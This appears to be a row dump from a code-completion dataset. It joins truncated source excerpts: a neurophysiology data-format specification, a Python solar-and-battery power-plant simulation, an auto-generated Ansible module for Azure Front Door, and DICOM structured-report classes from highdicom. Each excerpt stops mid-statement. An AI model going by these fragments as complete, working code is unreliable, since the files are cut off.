input
stringlengths
2.65k
237k
output
stringclasses
1 value
stores whether the interval just started " "(>0 value) or ended (<0 value). Different interval types can be represented in " "the same series by using multiple key values (eg, 1 for feature A, 2 for feature " "B, 3 for feature C, etc). The field data stores an 8-bit integer. This is largely " "an alias of a standard TimeSeries but that is identifiable as representing time " "intervals in a machine-readable way."), "merge": ["<TimeSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["2"], "value": ["TimeSeries","IntervalSeries"], "const": True}, "help?": { "data_type": "text", "value": "Stores the start and stop times for events", "const": True}}, "data": { "description": (">0 if interval started, <0 if interval ended."), "dimensions": ["num_times"], "attributes": { "conversion": { # "description": "Valus is float('nan') (const) since this does not apply.", "value": "float('NaN')", "const": True}, "resolution": { # "description": "Value is float('nan') (const) since this does not apply", "value": "float('NaN')", "const": True}, "unit": { # "description": "Value is \"n/a\" to indicate that this does not apply", "value": "n/a", "const": True}}, "data_type": "int8"}, }, "<OptogeneticSeries>/": { "description": "Optogenetic stimulus. The data[] field is in unit of watts.", "merge": ["<TimeSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["2"], "value":["TimeSeries","OptogeneticSeries"], "const": True}, "help?": { "data_type": "text", "value": "Optogenetic stimulus", "const": True}}, "data": { "description": "Applied power for optogenetic stimulus.", "dimensions": ["num_times"], "attributes": { "unit": { "data_type": "text", "value": "watt" }}, "data_type": "float32"}, "site": { "description": "Name of site description in general/optogentics.", "data_type": "text", "references": "/general/optogenetics/<site_X>/"} }, "<RoiResponseSeries>/": { "description": ("ROI responses over an imaging plane. Each row in data[] should correspond to " "the signal from one ROI."), "merge": ["<TimeSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["2"], "value": ["TimeSeries","RoiResponseSeries"], "const": True }, "help?": { "data_type": "text", "value": ("ROI responses over an imaging plane. Each row in data[] should " "correspond to the signal from one ROI"), "const": True}}, "data": { "description": "Signals from ROIs", "dimensions": ["num_times", "num_ROIs"], "data_type": "float32"}, "segmentation_interface/": { "description": "HDF5 link to image segmentation module defining ROIs.", "link": {"target_type": "ImageSegmentation/", "allow_subclasses": False } }, "segmentation_interface_path": { "description": "Path to segmentation module.", "data_type": "text", "autogen": { "type": "link_path", "target":"segmentation_interface/", "trim": False, "qty": "!", "format": "$t"}}, "roi_names": { "description": "List of ROIs represented, one name for each row of data[].", "data_type": "text", "dimensions": ["num_ROIs",] } }, "<SpatialSeries>/": { "description": ("Direction, e.g., of gaze or travel, or position. The " "TimeSeries::data field is a 2D array storing position or direction relative " "to some reference frame. Array structure: [num measurements] [num dimensions]. " "Each SpatialSeries has a text dataset reference_frame that indicates the " "zero-position, or the zero-axes for direction. For example, if representing " "gaze direction, \"straight-ahead\" might be a specific pixel on the monitor, " "or some other point in space. For position data, the 0,0 point might be the " "top-left corner of an enclosure, as viewed from the tracking camera. The unit " "of data will indicate how to interpret SpatialSeries values."), "merge": ["<TimeSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["2"], "value":["TimeSeries","SpatialSeries"], "const": True }, "help?": { "data_type": "text", "value": ("Stores points in space over time. The data[] array structure " "is [num samples][num spatial dimensions]"), "const": True}}, "reference_frame^": { "description": "Description defining what exactly 'straight-ahead' means.", "data_type": "text"}, "data": { "description": "2-D array storing position or direction relative to some reference frame.", "dimensions": ["num_times", "num_features"], "attributes": { "unit": { "data_type": "text", "value": "meter" }}, "data_type": "number"}, }, "<ElectricalSeries>/": { "description": ("Stores acquired voltage data from extracellular recordings. " "The data field of an ElectricalSeries is an int or float array storing data " "in Volts. " "TimeSeries::data array structure: :blue:`[num times] [num channels] " "(or [num_times] for single electrode).`"), "merge": ["<TimeSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["2"], "const":True, "value": ["TimeSeries","ElectricalSeries"]}, "help?": { "data_type": "text", "value": "Stores acquired voltage data from extracellular recordings", "const": True}}, "data": { "description": "Recorded voltage data.", "dimensions": [ ["num_times"], # for single electrode (2-d array) ["num_times", "num_channels"]], # for multiple electrode (3-d array) "data_type": "number", "attributes": { "unit": { "data_type": "text", "value": "volt" }}}, "electrode_idx": { "description": ("Indicies (zero-based) to electrodes in " "general/extracellular_ephys/electrode_map."), "dimensions": ["num_channels"], "data_type": "int32", "references": "/general/extracellular_ephys/electrode_map.num_electrodes",}, }, "<SpikeEventSeries>/": { "description": ("Stores \"snapshots\" of spike events (i.e., threshold crossings) " "in data. This may also be raw data, as reported by ephys hardware. If so, the " "TimeSeries::description field should describing how events were detected. All " "SpikeEventSeries should reside in a module (under EventWaveform interface) " "even if the spikes were reported and stored by hardware. All events span the " "same recording channels and store snapshots of equal duration. " "TimeSeries::data array structure: :blue:`[num events] [num channels] [num samples] " "(or [num events] [num samples] for single electrode)`."), "merge": ["<ElectricalSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["3"], "value":["TimeSeries","ElectricalSeries","SpikeEventSeries"], "const": True}, "help?": { "data_type": "text", "value": "Snapshots of spike events from data.", "const": True}}, "data": { "description": "Spike waveforms.", "dimensions": [ ["num_events", "num_samples"], # for single electrode (2-d array) ["num_events","num_channels","num_samples"]], # for multiple electrode (3-d array) "data_type": "float32", "attributes": { "unit": { "data_type": "text", "value": "volt" }}}, }, "<PatchClampSeries>/": { "description": ("Stores stimulus or response current or voltage. " "Superclass definition for patch-clamp data (this class " "should not be instantiated directly)."), "merge": ["<TimeSeries>/"], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["2"], "value": ["TimeSeries","PatchClampSeries"], "const": True}, "help?": { "data_type": "text", "value": ("Superclass definition for patch-clamp data"), "const": True}}, "data": { "description": "Recorded voltage or current.", "dimensions": ["num_times"], "data_type": "number"}, "electrode_name": { "description": "Name of electrode entry in /general/intracellular_ephys.", "data_type": "text", "references": "/general/intracellular_ephys/<electrode_X>/"}, "gain^": { "description": "Units: Volt/Amp (v-clamp) or Volt/Volt (c-clamp)", "data_type": "float"}, }, "<VoltageClampStimulusSeries>/": { "description": ("Aliases to standard PatchClampSeries. Its functionality is to better" " tag PatchClampSeries for machine (and human) readability of the file."), "merge": ["<PatchClampSeries>/", ], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["3"], "value": ["TimeSeries","PatchClampSeries","VoltageClampStimulusSeries"], "const": True}, "help?": { "data_type": "text", "value": ("Stimulus voltage applied during voltage clamp recording"), "const": True}}, }, "<CurrentClampStimulusSeries>/": { "description": ("Aliases to standard PatchClampSeries. Its functionality is to better" " tag PatchClampSeries for machine (and human) readability of the file."), "merge": ["<PatchClampSeries>/", ], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["3"], "value": ["TimeSeries","PatchClampSeries","CurrentClampStimulusSeries"], "const": True}, "help?": { "data_type": "text", "value": ("Stimulus current applied during current clamp recording"), "const": True}}, }, "<VoltageClampSeries>/": { "description": ("Stores current data recorded from intracellular voltage-clamp" " recordings. A corresponding VoltageClampStimulusSeries (stored separately as a" " stimulus) is used to store the voltage injected."), "merge": ["<PatchClampSeries>/", ], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["3"], "value": ["TimeSeries","PatchClampSeries","VoltageClampSeries"], "const": True}, "help?": { "data_type": "text", "value": ("Current recorded from cell during voltage-clamp recording"), "const": True}}, "capacitance_fast^": { "attributes": { "unit": {"data_type": "text", "value": "Farad"}}, "description": "Unit: Farad", "data_type": "float32"}, "capacitance_slow^": { "attributes": { "unit": {"data_type": "text", "value": "Farad"}}, "description": "Unit: Farad", "data_type": "float32"}, "resistance_comp_bandwidth^": { "attributes": { "unit": {"data_type": "text", "value": "Hz"}}, "description": "Unit: Hz", "data_type": "float32"}, "resistance_comp_correction^": { "attributes": { "unit": {"data_type": "text", "value": "pecent"}}, "description": "Unit: %", "data_type": "float32"}, "resistance_comp_prediction^": { "attributes": { "unit": {"data_type": "text", "value": "pecent"}}, "description": "Unit: %", "data_type": "float32"}, "whole_cell_capacitance_comp^": { "attributes": { "unit": {"data_type": "text", "value": "Farad"}}, "description": "Unit: Farad", "data_type": "float32"}, "whole_cell_series_resistance_comp^": { "attributes": { "unit": {"data_type": "text", "value": "Ohm"}}, "description": "Unit: Ohm", "data_type": "float32"} }, "<CurrentClampSeries>/": { "description": ("Stores voltage data recorded from intracellular current-clamp recordings." " A corresponding CurrentClampStimulusSeries (stored separately as a stimulus) is used" " to store the current injected."), "merge": ["<PatchClampSeries>/", ], "attributes": { "ancestry": { "data_type": "text", "dimensions": ["3"], "value": ["TimeSeries","PatchClampSeries","CurrentClampSeries"], "const": True}, "help?": { "data_type": "text", "value": ("Voltage recorded from cell during current-clamp recording"), "const": True}}, "bias_current^": { "description": "Unit: Amp", "data_type": "float32"}, "bridge_balance^": { "description": "Unit: Ohm", "data_type": "float32"}, "capacitance_compensation^": { "description": "Unit: Farad", "data_type": "float32"}, # "resistance_compensation": { # "description": "Resistance compensation", # "data_type": "float", # "unit": "Ohms"}, }, "<IZeroClampSeries>/": { "description":
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# """ BLIS - Balancing Load of Intermittent Solar: A characteristic-based transient power plant model Copyright (C) 2020. University of Virginia Licensing & Ventures Group (UVA LVG). All Rights Reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# # Hardcoded Inputs: debug = False # If True, additional information is presented to the console plotDPI = 300 omitPeriod = 0 # Number of samples to ignore (5 hours to give sufficient start-up time) threshold = 0.001 # threshold for rounding (MW) # General Imports: import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns # BLIS Imports: from blis import defaultInputs, PowerPlant, Solar, Fuel, Battery, Grid # ======================================================================== # Class to simulate and analyze Hybrid Renewable Energy System (HRES) # ======================================================================== # Time Series Data attributes_time_series = ['PowerRequest', 'PowerOutput', 'PowerRamp', 'HeatInput', 'Efficiency', 'battCharge', 'battIncrease', 'battDecrease', 'battDischargeRate', 'battChargeRate', 'battRamp', 'solarUsed', 'loadShed', 'deficit', 'gridUsed', 'CO2_produced', 'CO2_captured', 'Emissions'] # Results attributes_results = ['demand_MWh', 'solar_MWh', 'powerOutput_MWh', 'heatInput_MWh', 'solarUsed_MWh', 'loadShed_MWh', 'gridUsed_MWh', 'fuelCost_dollars', 'LCOE', 'efficiency_pct', 'emissions_tons', 'deficit_max', 'deficit_min', 'deficit_pct_time', 'deficit_pct_energy', 'solarCurtail_pct', 'loadShed_pct_energy', 'loadShed_pct_time'] # Add time of day attributes tod_vars = ['emissions', 'costs', 'demand'] tod_hrs = range(24) attributes_tod = [] for var in tod_vars: for hr in tod_hrs: if hr < 10: attributes_tod.append(var + '_hr0' + str(hr)) else: attributes_tod.append(var + '_hr' + str(hr)) attributes_results = attributes_results + attributes_tod # ======================================================================== # Class to simulate and analyze Hybrid Renewable Energy System (HRES) # ======================================================================== class HRES: # ======================================================================== # Initialize HRES Simulation # ======================================================================== def __init__(self, data, plant, solar=Solar(), batt=Battery(), fuel=Fuel(), grid=Grid(), i=0.02, n=20): # Store Inputs self.data = data self.solar = solar self.batt = batt self.fuel = fuel self.plant = plant self.grid = grid self.i = i # (fraction) Interst rate self.n = n # (years) System lifetime # Record number of datapoints self.steps = len(data) # Create pandas dataframe to hold time series performance rows = range(self.steps) self.perf = pd.DataFrame(data=0.0, index=rows, columns=attributes_time_series) # ---- # Create pandas series to store results # ---- self.results = pd.Series(index=attributes_results) # ======================================================================== # Update - empty control, needs to be updated by all children of HRES # ======================================================================== def update(self, dt, hour, demand, solar): # ---------- # Calculate Battery Dis/charge Rate Available # ---------- batt_c_rate = self.batt.getChargeRateAvail(dt) batt_d_rate = self.batt.getDischargeRateAvail(dt) if self.plant.capacity > 0.0: # ---------- # Power Plant Control # ---------- # Get Minimum Power Plant Request and # minimum generation possible for current timestep minPowerRequest = self.plant.minPowerRequest minGen = minPowerRequest + solar # If minimum generation will meet or exceed demand, request minimum power plant output # Otherwise, use solar and battery, then request additional production if minGen > demand or abs(minGen - demand) < threshold: powerRequest = minPowerRequest else: powerRequest = demand - solar - batt_d_rate # Keep Power Request at or below max plant capacity if powerRequest > self.plant.capacity: powerRequest = self.plant.capacity # Keep Power Request at or above min plant capacity if powerRequest < minPowerRequest: powerRequest = minPowerRequest # Keep power request at or above threshold if powerRequest < threshold: powerRequest = threshold # Update Power Plant Status self.plant.update(powerRequest, dt) # ---------- # Perform Energy Balance # ---------- supply = self.plant.powerOutput + solar diff = supply - demand battIncrease = 0.0 battDecrease = 0.0 solarUsed = 0.0 loadShed = 0.0 gridUsed = 0.0 # 1) Demand = Supply (within threshold) if (abs(diff) < threshold): solarUsed = solar # 2) Supply > Demand elif (diff > 0.0): # A) Charge Batteries if diff > batt_c_rate: battIncrease = batt_c_rate else: battIncrease = diff diff = diff - battIncrease # Update diff # B) Curtail Solar if diff < solar: solarUsed = solar - diff else: solarUsed = 0.0 diff = diff - (solar - solarUsed) # Update diff # C) Shed Load loadShed = diff # 3) Demand > Supply else: # No excess suppply, so solar is fully used and no load is shed solarUsed = solar # Discharge Batteries if abs(diff) > batt_d_rate: battDecrease = batt_d_rate else: battDecrease = abs(diff) # Update diff = diff + battDecrease # Use grid to make-up remaining difference if abs(diff) < self.grid.capacity: gridUsed = abs(diff) else: gridUsed = self.grid.capacity # ---------- # Calculate Emissions # ---------- CO2_produced = (gridUsed * dt * self.grid.getEmissions(hour)) + ( self.plant.heatInput / 60.0 * dt * self.fuel.emissions) CO2_captured = CO2_produced * (self.plant.co2CaptureEff / 100.0) Emissions = CO2_produced - CO2_captured # ---------- # Update Battery # ---------- self.batt.update(dt, battIncrease, battDecrease) # ---------- # Check Energy Balance # ---------- E_in = solar + self.plant.powerOutput + battDecrease + gridUsed E_out = demand + battIncrease + loadShed + (solar - solarUsed) E_balance = E_in - E_out # Remainder of energy balance stored as deficit deficit = E_balance # ======= # Write to console if debugging # ======= if debug: print("#-----------#") print("Batt Charge [MWh]: " + str(self.batt.charge)) print("---") print("solar " + str(solar)) print("powerOutput " + str(self.plant.powerOutput)) print("battDecrease " + str(self.batt.decrease)) print("Energy In [MW]:" + str(E_in)) print("---") print("demand " + str(demand)) print("battIncrease " + str(self.batt.increase)) print("loadShed " + str(loadShed)) print("solarShed " + str(solar - solarUsed)) print("Energy Out [MW]:" + str(E_out)) print("---") print("Balance [MW]:" + str(E_balance)) print("#-----------#") # ======= # Store performance of current timestep in a pandas series # ======= perf = pd.Series(index=attributes_time_series) # Power plant perf.PowerRequest = self.plant.powerRequest perf.PowerOutput = self.plant.powerOutput perf.PowerRamp = self.plant.powerRamp perf.HeatInput = self.plant.heatInput perf.Efficiency = self.plant.efficiency # Battery perf.battCharge = self.batt.charge perf.battIncrease = self.batt.increase perf.battDecrease = self.batt.decrease perf.battDischargeRate = self.batt.dischargeRate perf.battChargeRate = self.batt.chargeRate perf.battRamp = self.batt.ramp # Other perf.solarUsed = solarUsed perf.loadShed = loadShed perf.deficit = deficit perf.gridUsed = gridUsed perf.CO2_produced = CO2_produced perf.CO2_captured = CO2_captured perf.Emissions = Emissions return perf # ======================================================================== # Run Simulation # ======================================================================== def run(self): # Simulate operation for step in range(self.steps): # Access current demand and time step dt = self.data.loc[step, 'dt'] hour = self.data.loc[step, 'hour'] demand = self.data.loc[step, 'demand'] solar = self.data.loc[step, 'solar'] # Print Status (if debugging) if debug: print("\n\nStep: " + str(step)) print("dt (min) : " + str(dt)) print("hour : " + str(hour)) print("Demand (MW) : " + str(demand)) print("Solar (MW) : " + str(solar)) # Update System Operation self.perf.loc[step, :] = self.update(dt, hour, demand, solar) # Store Current Performance # Analyze Results results = self.analyzeResults() return results # ======================================================================== # Analyze Results # ======================================================================== def analyzeResults(self): data = self.data perf = self.perf # Check that enough data points exist for omitPeriod, if not use all data points if len(data) > omitPeriod: data = data.loc[omitPeriod:] perf = perf.loc[omitPeriod:] # Calculate Energy Use from Power ( MW to MWh) # Inputs df_demand = data.loc[:]["demand"] * data[:]["dt"] / 60 df_solar = data.loc[:]["solar"] * data[:]["dt"] / 60 df_powerOutput = perf.loc[:]["PowerOutput"] * data[:]["dt"] / 60 df_heatInput = perf.loc[:]["HeatInput"] * data[:]["dt"] / 60 df_solarUsed = perf.loc[:]["solarUsed"] * data[:]["dt"] / 60 df_loadShed = perf.loc[:]["loadShed"] * data[:]["dt"] / 60 df_deficit = perf.loc[:]["deficit"] * data[:]["dt"] / 60 df_gridUsed = perf.loc[:]["gridUsed"] * data[:]["dt"] / 60 # Sum for the year demand_MWh = df_demand.sum() solar_MWh = df_solar.sum() powerOutput_MWh = df_powerOutput.sum() heatInput_MWh = df_heatInput.sum() solarUsed_MWh = df_solarUsed.sum() loadShed_MWh = df_loadShed.sum() deficit_MWh = df_deficit.sum() gridUsed_MWh = df_gridUsed.sum() # Fuel Cost fuelCost_dollars = heatInput_MWh * self.fuel.cost # $ # Effective Efficiency if heatInput_MWh > 0.0: efficiency_pct
<filename>generated/intermediate/ansible-module-rest/azure_rm_frontdoor.py #!/usr/bin/python # # Copyright (c) 2019 <NAME>, (@zikalino) # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_frontdoor version_added: '2.9' short_description: Manage Azure FrontDoor instance. description: - 'Create, update and delete instance of Azure FrontDoor.' options: resource_group: description: - Name of the Resource group within the Azure subscription. required: true type: str name: description: - Resource name. type: str location: description: - Resource location. type: str friendly_name: description: - A friendly name for the frontDoor type: str routing_rules: description: - Routing rules associated with this Front Door. type: list suboptions: id: description: - Resource ID. type: str frontend_endpoints: description: - Frontend endpoints associated with this rule type: list suboptions: id: description: - Resource ID. type: str accepted_protocols: description: - Protocol schemes to match for this rule type: list patterns_to_match: description: - The route patterns of the rule. type: list enabled_state: description: - >- Whether to enable use of this rule. Permitted values are 'Enabled' or 'Disabled' type: str route_configuration: description: - A reference to the routing configuration. type: dict resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str load_balancing_settings: description: - Load balancing settings associated with this Front Door instance. type: list suboptions: id: description: - Resource ID. type: str sample_size: description: - The number of samples to consider for load balancing decisions type: number successful_samples_required: description: - The number of samples within the sample period that must succeed type: number additional_latency_milliseconds: description: - >- The additional latency in milliseconds for probes to fall into the lowest latency bucket type: number resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str health_probe_settings: description: - Health probe settings associated with this Front Door instance. type: list suboptions: id: description: - Resource ID. type: str path: description: - The path to use for the health probe. Default is / type: str protocol: description: - Protocol scheme to use for this probe type: str interval_in_seconds: description: - The number of seconds between health probes. type: number resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str backend_pools: description: - Backend pools available to routing rules. type: list suboptions: id: description: - Resource ID. type: str backends: description: - The set of backends for this pool type: list suboptions: address: description: - Location of the backend (IP address or FQDN) type: str http_port: description: - The HTTP TCP port number. Must be between 1 and 65535. type: number https_port: description: - The HTTPS TCP port number. Must be between 1 and 65535. type: number enabled_state: description: - >- Whether to enable use of this backend. Permitted values are 'Enabled' or 'Disabled' type: str priority: description: - >- Priority to use for load balancing. Higher priorities will not be used for load balancing if any lower priority backend is healthy. type: number weight: description: - Weight of this endpoint for load balancing purposes. type: number backend_host_header: description: - >- The value to use as the host header sent to the backend. If blank or unspecified, this defaults to the incoming host. type: str load_balancing_settings: description: - Load balancing settings for a backend pool type: dict suboptions: id: description: - Resource ID. type: str health_probe_settings: description: - L7 health probe settings for a backend pool type: dict suboptions: id: description: - Resource ID. type: str resource_state: description: - Resource status. type: str name: description: - Resource name. type: str type: description: - Resource type. type: str frontend_endpoints: description: - Frontend endpoints available to routing rules. type: list suboptions: id: description: - Resource ID. type: str host_name: description: - The host name of the frontendEndpoint. Must be a domain name. type: str session_affinity_enabled_state: description: - >- Whether to allow session affinity on this host. Valid options are 'Enabled' or 'Disabled' type: str session_affinity_ttl_seconds: description: - >- UNUSED. This field will be ignored. The TTL to use in seconds for session affinity, if applicable. type: number web_application_firewall_policy_link: description: - >- Defines the Web Application Firewall policy for each host (if applicable) type: dict suboptions: id: description: - Resource ID. type: str resource_state: description: - Resource status. type: str custom_https_provisioning_state: description: - Provisioning status of Custom Https of the frontendEndpoint. type: str custom_https_provisioning_substate: description: - >- Provisioning substate shows the progress of custom HTTPS enabling/disabling process step by step. type: str custom_https_configuration: description: - The configuration specifying how to enable HTTPS type: dict suboptions: certificate_source: description: - Defines the source of the SSL certificate type: str protocol_type: description: - >- Defines the TLS extension protocol that is used for secure delivery type: str key_vault_certificate_source_parameters: description: - >- KeyVault certificate source parameters (if certificateSource=AzureKeyVault) type: dict front_door_certificate_source_parameters: description: - >- Parameters required for enabling SSL with Front Door-managed certificates (if certificateSource=FrontDoor) type: dict name: description: - Resource name. type: str type: description: - Resource type. type: str backend_pools_settings: description: - Settings for all backendPools type: dict suboptions: enforce_certificate_name_check: description: - >- Whether to enforce certificate name check on HTTPS requests to all backend pools. No effect on non-HTTPS requests. type: str enabled_state: description: - >- Operational status of the Front Door load balancer. Permitted values are 'Enabled' or 'Disabled' type: str resource_state: description: - Resource status of the Front Door. type: str provisioning_state: description: - Provisioning state of the Front Door. type: str cname: description: - The host that each frontendEndpoint must CNAME to. type: str id: description: - Resource ID. type: str type: description: - Resource type. type: str state: description: - Assert the state of the FrontDoor. - >- Use C(present) to create or update an FrontDoor and C(absent) to delete it. default: present choices: - absent - present extends_documentation_fragment: - azure - azure_tags author: - <NAME> (@zikalino) ''' EXAMPLES = ''' - name: Create or update specific Front Door azure_rm_frontdoor: resource_group: myResourceGroup name: myFrontDoor front_door_parameters: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }} location: westus tags: tag1: value1 tag2: value2 properties: routingRules: - name: routingRule1 properties: frontendEndpoints: - id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/frontendEndpoints/{{ frontend_endpoint_name }} - id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/frontendEndpoints/{{ frontend_endpoint_name }} acceptedProtocols: - Http patternsToMatch: - /* routeConfiguration: '@odata.type': >- #Microsoft.Azure.FrontDoor.Models.FrontdoorForwardingConfiguration backendPool: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/backendPools/{{ backend_pool_name }} enabledState: Enabled healthProbeSettings: - name: healthProbeSettings1 properties: path: / protocol: Http intervalInSeconds: '120' loadBalancingSettings: - name: loadBalancingSettings1 properties: sampleSize: '4' successfulSamplesRequired: '2' backendPools: - name: backendPool1 properties: backends: - address: w3.contoso.com httpPort: '80' httpsPort: '443' weight: '1' priority: '2' - address: contoso.com.website-us-west-2.othercloud.net httpPort: '80' httpsPort: '443' weight: '2' priority: '1' - address: contoso1.azurewebsites.net httpPort: '80' httpsPort: '443' weight: '1' priority: '1' loadBalancingSettings: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/loadBalancingSettings/{{ load_balancing_setting_name }} healthProbeSettings: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoors/{{ front_door_name }}/healthProbeSettings/{{ health_probe_setting_name }} frontendEndpoints: - name: frontendEndpoint1 properties: hostName: www.contoso.com sessionAffinityEnabledState: Enabled sessionAffinityTtlSeconds: '60' webApplicationFirewallPolicyLink: id: >- /subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Network/frontDoorWebApplicationFirewallPolicies/{{ front_door_web_application_firewall_policy_name }} - name: default properties: hostName: frontDoor1.azurefd.net backendPoolsSettings: enforceCertificateNameCheck: Enabled enabledState: Enabled - name: Delete Front Door azure_rm_frontdoor: resource_group: myResourceGroup name: myFrontDoor state: absent ''' RETURN = ''' id: description: - Resource ID. returned: always type: str sample: null name: description: - Resource name. returned: always type: str sample: null type: description: - Resource type. returned: always type: str sample: null location: description: - Resource location. returned: always type: str sample: null tags: description: - Resource tags. returned: always type: >- unknown[DictionaryType {"$id":"539","$type":"DictionaryType","valueType":{"$id":"540","$type":"PrimaryType","knownPrimaryType":"string","name":{"$id":"541","fixed":false,"raw":"String"},"deprecated":false},"supportsAdditionalProperties":false,"name":{"$id":"542","fixed":false},"deprecated":false}] sample: null properties: description: - Properties of the Front Door Load Balancer returned: always type: dict sample: null contains: friendly_name: description: - A friendly name for the frontDoor returned: always type: str sample: null routing_rules: description: - Routing rules associated with this Front Door. returned:
<gh_stars>0 """DICOM structured reporting content item value types.""" import datetime from typing import Any, List, Optional, Sequence, Union import numpy as np from pydicom.dataset import Dataset from pydicom.sequence import Sequence as DataElementSequence from pydicom.sr.coding import Code from pydicom.uid import UID from pydicom.valuerep import DA, TM, DT, PersonName from highdicom.sr.coding import CodedConcept from highdicom.sr.enum import ( GraphicTypeValues, GraphicTypeValues3D, PixelOriginInterpretationValues, RelationshipTypeValues, TemporalRangeTypeValues, ValueTypeValues, ) class ContentItem(Dataset): """Abstract base class for a collection of attributes contained in the DICOM SR Document Content Module.""" def __init__( self, value_type: Union[str, ValueTypeValues], name: Union[Code, CodedConcept], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- value_type: Union[str, highdicom.sr.enum.ValueTypeValues] type of value encoded in a content item name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] coded name or an enumerated item representing a coded name relationship_type: Union[str, highdicom.sr.enum.RelationshipTypeValues], optional type of relationship with parent content item """ # noqa super(ContentItem, self).__init__() value_type = ValueTypeValues(value_type) self.ValueType = value_type.value if not isinstance(name, (CodedConcept, Code, )): raise TypeError( 'Argument "name" must have type CodedConcept or Code.' ) if isinstance(name, Code): name = CodedConcept(*name) self.ConceptNameCodeSequence = [name] if relationship_type is not None: relationship_type = RelationshipTypeValues(relationship_type) self.RelationshipType = relationship_type.value def __setattr__(self, name: str, value: Any) -> None: if name == 'ContentSequence': super(ContentItem, self).__setattr__(name, ContentSequence(value)) else: super(ContentItem, self).__setattr__(name, value) @property def name(self) -> CodedConcept: """CodedConcept: coded name of the content item""" return self.ConceptNameCodeSequence[0] @property def value_type(self) -> str: """str: type of the content item (see `highdicom.sr.value_types.ValueTypeValues`) """ return self.ValueType @property def relationship_type(self) -> str: """str: type of relationship the content item has with its parent (see `highdicom.sr.enum.RelationshipTypeValues`) """ return getattr(self, 'RelationshipType', None) class ContentSequence(DataElementSequence): """Sequence of DICOM SR Content Items.""" def __init__(self, items: Optional[Sequence] = None) -> None: if items is not None: if not all(isinstance(i, ContentItem) for i in items): raise TypeError( 'Items of "{}" must have type ContentItem.'.format( self.__class__.__name__ ) ) super(ContentSequence, self).__init__(items) def __setitem__(self, position: int, item: ContentItem) -> None: self.insert(position, item) def __contains__(self, item: ContentItem) -> bool: return any(contained_item == item for contained_item in self) def get_nodes(self) -> 'ContentSequence': """Gets content items that represent nodes in the content tree, i.e. target items that have a `ContentSequence` attribute. Returns ------- highdicom.sr.value_types.ContentSequence[highdicom.sr.value_types.ContentItem] matched content items """ return self.__class__([ item for item in self if hasattr(item, 'ContentSequence') ]) def append(self, item: ContentItem) -> None: """Appends a content item to the sequence. Parameters ---------- item: highdicom.sr.value_types.ContentItem content item """ if not isinstance(item, ContentItem): raise TypeError( 'Items of "{}" must have type ContentItem.'.format( self.__class__.__name__ ) ) super(ContentSequence, self).append(item) def extend(self, items: Sequence[ContentItem]) -> None: """Extends multiple content items to the sequence. Parameters ---------- items: Sequence[highdicom.sr.value_types.ContentItem] content items """ for i in items: self.append(i) def insert(self, position: int, item: ContentItem) -> None: """Inserts a content item into the sequence at a given position. Parameters ---------- position: int index position item: highdicom.sr.value_types.ContentItem content item """ if not isinstance(item, ContentItem): raise TypeError( 'Items of "{}" must have type ContentItem.'.format( self.__class__.__name__ ) ) super(ContentSequence, self).insert(position, item) class CodeContentItem(ContentItem): """DICOM SR document content item for value type CODE.""" def __init__( self, name: Union[Code, CodedConcept], value: Union[Code, CodedConcept], relationship_type: Optional[ Union[str, RelationshipTypeValues] ] = None ) -> None: """ Parameters ---------- name: Union[highdicom.sr.coding.CodedConcept, pydicom.sr.coding.Code] concept name value: Union[highdicom.sr.coding.CodedConcept, 